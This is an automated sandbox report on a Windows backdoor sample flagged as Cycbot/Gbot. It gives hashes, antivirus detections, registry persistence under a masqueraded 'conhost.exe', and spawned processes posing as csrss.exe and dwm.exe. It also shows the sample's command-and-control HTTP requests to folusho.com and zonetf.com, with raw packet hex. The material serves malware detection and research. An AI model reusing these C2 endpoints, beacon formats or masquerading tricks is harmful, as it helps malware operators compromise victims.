Analysis Date2014-08-15 09:12:43
MD5e04ac1e247406a1db36798b9ebb8dc01
SHA11c4a3b09b48ff516db7200467608530d3bcfada6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 1f4d582b9a5361b89d3df5aa82ca758c sha1: 38190a8eacbea97688d05f4f8f32b91dacad3594 size: 95744
Section.rdata md5: 222b6a0a30a800423d813d1b96bd50ad sha1: 2a6f13e5622730f14669ec94eab252366138b74f size: 1024
Section.data md5: fc8606efd0443b10f09bab8f6829423a sha1: 6e4e2afd530c83267cd4e899dcfb1e2f53925f3a size: 53248
Section.isete md5: 3d0a32471d4c76839118117d3d85f2c6 sha1: 8a71d8a621a0a2fbc8e75b64ca95b85a02b9902c size: 1024
Timestamp2005-10-16 19:03:29
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1567
PEhash0fb8dd5ef7fb80f4968b6e681352301a852e3754
IMPhashff9118adb1b0766ec6737875bbc20bfe
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-6706
AVDr. Webno_virus
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.MGI
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)FakeAlert.AAX
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus
AVYara APTno_virus
AVZillya!Trojan.FakeAV.Win32.186128

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSpdadatarestore.com
Winsock DNSfolusho.com
Winsock DNS127.0.0.1
Winsock DNSsearchmobilecode.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSfolusho.com
Type: A
67.222.55.143
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSsearchmobilecode.com
Type: A
DNSpdadatarestore.com
Type: A
HTTP GEThttp://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v59=37&tq=gKZEtzyjyUrcZku97u8QH6NAOgoJtdmsrn4nk%2BrkoErxeOGwt7zQcFT73V2R1chWZfPnWS1z2pLn8rHqJIsL8sD4dUow8hJ6VqrY3Xu3lsRo9i4UX8tqwYmdIFGNIUlCoyUgQ0cX90HbnciUhAAWAxCT%2FOWPie%2BVacTppSJ9Gq0oDALTt7t20ehDMaigSnbbzSvZKZ8QI1h2Z396EW6xTILT1PxngWE878wa6w%2B4L%2BVvxoAvu5xxnWGtDWMMUTCg5BfTD%2FWdWsY6S8aczLZd2xc3%2BW631Ibv2KDsrvMnyoy%2FGbVnb17cJAVbt4DQMaZR6%2FkM7oo%2FnasnTs56teeYos3%2FZjv%2Fh0EvNHKd6RzL9pNYCXM8yuK4bdMNLAHt88jv3K%2BGyT008%2Be7aGY
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 67.222.55.143:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 35393d33   00x251.jpg?v59=3
0x00000040 (00064)   37267471 3d674b5a 45747a79 6a795572   7&tq=gKZEtzyjyUr
0x00000050 (00080)   635a6b75 39377538 5148364e 414f676f   cZku97u8QH6NAOgo
0x00000060 (00096)   4a74646d 73726e34 6e6b2532 42726b6f   Jtdmsrn4nk%2Brko
0x00000070 (00112)   45727865 4f477774 377a5163 46543733   ErxeOGwt7zQcFT73
0x00000080 (00128)   56325231 6368575a 66506e57 53317a32   V2R1chWZfPnWS1z2
0x00000090 (00144)   704c6e38 7248714a 49734c38 73443464   pLn8rHqJIsL8sD4d
0x000000a0 (00160)   556f7738 684a3656 71725933 5875336c   Uow8hJ6VqrY3Xu3l
0x000000b0 (00176)   73526f39 69345558 38747177 596d6449   sRo9i4UX8tqwYmdI
0x000000c0 (00192)   46474e49 556c436f 79556751 30635839   FGNIUlCoyUgQ0cX9
0x000000d0 (00208)   3048626e 63695568 41415741 78435425   0HbnciUhAAWAxCT%
0x000000e0 (00224)   32464f57 50696525 32425661 63547070   2FOWPie%2BVacTpp
0x000000f0 (00240)   534a3947 71306f44 414c5474 37743230   SJ9Gq0oDALTt7t20
0x00000100 (00256)   6568444d 61696753 6e62627a 53765a4b   ehDMaigSnbbzSvZK
0x00000110 (00272)   5a385149 3168325a 33393645 57367854   Z8QI1h2Z396EW6xT
0x00000120 (00288)   494c5431 50786e67 57453837 38776136   ILT1PxngWE878wa6
0x00000130 (00304)   77253242 344c2532 42567678 6f417675   w%2B4L%2BVvxoAvu
0x00000140 (00320)   3578786e 57477444 574d4d55 54436735   5xxnWGtDWMMUTCg5
0x00000150 (00336)   42665444 25324657 64577359 36533861   BfTD%2FWdWsY6S8a
0x00000160 (00352)   637a4c5a 64327863 33253242 57363331   czLZd2xc3%2BW631
0x00000170 (00368)   49627632 4b447372 764d6e79 6f792532   Ibv2KDsrvMnyoy%2
0x00000180 (00384)   46476256 6e623137 634a4156 62743444   FGbVnb17cJAVbt4D
0x00000190 (00400)   514d615a 52362532 466b4d37 6f6f2532   QMaZR6%2FkM7oo%2
0x000001a0 (00416)   466e6173 6e547335 36746565 596f7333   FnasnTs56teeYos3
0x000001b0 (00432)   2532465a 6a762532 46683045 764e484b   %2FZjv%2Fh0EvNHK
0x000001c0 (00448)   6436527a 4c39704e 5943584d 3879754b   d6RzL9pNYCXM8yuK
0x000001d0 (00464)   3462644d 4e4c4148 7438386a 76334b25   4bdMNLAHt88jv3K%
0x000001e0 (00480)   32424779 54303038 25324265 37614759   2BGyT008%2Be7aGY
0x000001f0 (00496)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000200 (00512)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000210 (00528)   73743a20 666f6c75 73686f2e 636f6d0d   st: folusho.com.
0x00000220 (00544)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000230 (00560)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x00000240 (00576)   612f322e 300d0a0d 0a                  a/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a57 64577359 36533861   ose....WdWsY6S8a
0x00000160 (00352)   637a4c5a 64327863 33253242 57363331   czLZd2xc3%2BW631
0x00000170 (00368)   49627632 4b447372 764d6e79 6f792532   Ibv2KDsrvMnyoy%2
0x00000180 (00384)   46476256 6e623137 634a4156 62743444   FGbVnb17cJAVbt4D
0x00000190 (00400)   514d615a 52362532 466b4d37 6f6f2532   QMaZR6%2FkM7oo%2
0x000001a0 (00416)   466e6173 6e547335 36746565 596f7333   FnasnTs56teeYos3
0x000001b0 (00432)   2532465a 6a762532 46683045 764e484b   %2FZjv%2Fh0EvNHK
0x000001c0 (00448)   6436527a 4c39704e 5943584d 3879754b   d6RzL9pNYCXM8yuK
0x000001d0 (00464)   3462644d 4e4c4148 7438386a 76334b25   4bdMNLAHt88jv3K%
0x000001e0 (00480)   32424779 54303038 25324265 37614759   2BGyT008%2Be7aGY
0x000001f0 (00496)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000200 (00512)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000210 (00528)   73743a20 666f6c75 73686f2e 636f6d0d   st: folusho.com.
0x00000220 (00544)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000230 (00560)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x00000240 (00576)   612f322e 300d0a0d 0a                  a/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.>
.
U
.I.
..Yx
.(.
040904b0
1.0.0.3
1567
FileVersion
jjjjjj
PrivateBuild
ProductVersion
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
:1KJ*Q>
21-Crs
3  jHR
"3Q_Hb
>@`{4"
/4~376
__$4'i
5	~M^2
7FOW?r
*87H:'O
*%8KB[
=8'.ux
8X2&jC
%=9U(U
awEO/y
B4>[IK^
B8)f<mvq
	\bJ)j
c	2|rE
CharNextW
CharUpperW
CheckRemoteDebuggerPresent
c#!k'b
Cqv		:2`9
@.data
][Dc9|H
DD^fNQ
DeleteCriticalSection
DispatchMessageW
d	j,%9"
DocumentPropertiesW
Dp4d9J:+L
dv:|ta
e9^Hh~
EnumResourceTypesW
]'fb!!
fENi.F
FFDf/T#
f`HQ%T
FindClose
f+lJ\w'
FL@/wv
fvZ$*m
>g15&T=u|
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetTickCount
gI-L9<l
@g,	|kv
GlobalAlloc
GlobalFree
^G:!`w
gwzrIQ
:g?zD%7
'H3O9A
H({d:}
>hhh^-
?h[iIO
HoJ4EK9
))hUO<
I/8+B~^
i'a?uo44
Ih%L;g
i];Hnp
I'$M'c
InitializeCriticalSection
.isete
J&$7Lm
j	I-g8
JJF+&\
jj&T64
JoRil0
J t+r!
J]zaz#
k2O;BE+
k.!`2r
KERNEL32.dll
KillTimer
k}m=k/
@kw8o0
l8q*Vg
LockResource
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
-<l[&u
lx6XW=
<}m,	|
_M]"1%
MultiByteToWideChar
N<In>`
nR,b-4
<n_X'-
o1E546`
oFVL^x
OjKC,<el
OutputDebugStringW
OV&,|8
{o//>^X
]	p5]U
$PaOZ]1
p](;fR
p-Iv`e
PostThreadMessageW
'< %PQ]
Q*_,b61
Qdo%rJ
q\k7H<
^QpC>Q
q)'xb}
`.rdata
ReqiG=
sb'h:U2vT
SendMessageW
SetTimer
S^$wyH
| T&'9
!This program cannot be run in DOS mode.
tjTW4)
|tm7I~
TranslateMessage
t,S5{U
T%UOts
%Tv.G_9
u$HzOQ
UnregisterClassA
USER32.dll
U\TIL"!
UV{hdp
{UyYK7
$!+ve\
-v=&Hne
;[v<jT=
	]>v$M
#vr|$/
]V@Sh5
VSr&{Xh
W0Epa`w
w'!4V7
WideCharToMultiByte
WINSPOOL.DRV
w%mv%xG
wsprintfW
)?)){X
&	/\X9
xoLUZt
=x<t>jL
xV~k[E
xxy\_'
yI|46Q
YM/&T$
(y#ork
Yy4KL0
>z9E\4
z$j=5A
?ZkhWt
/Z)Ks}
zLvWz(
z.n"	<;Ef
ZOjg|`
z[\O.u
'Zs1TS%7
)"Ztpqe*
.|}ZtZZ~W
ZW.@GN
zzD/i(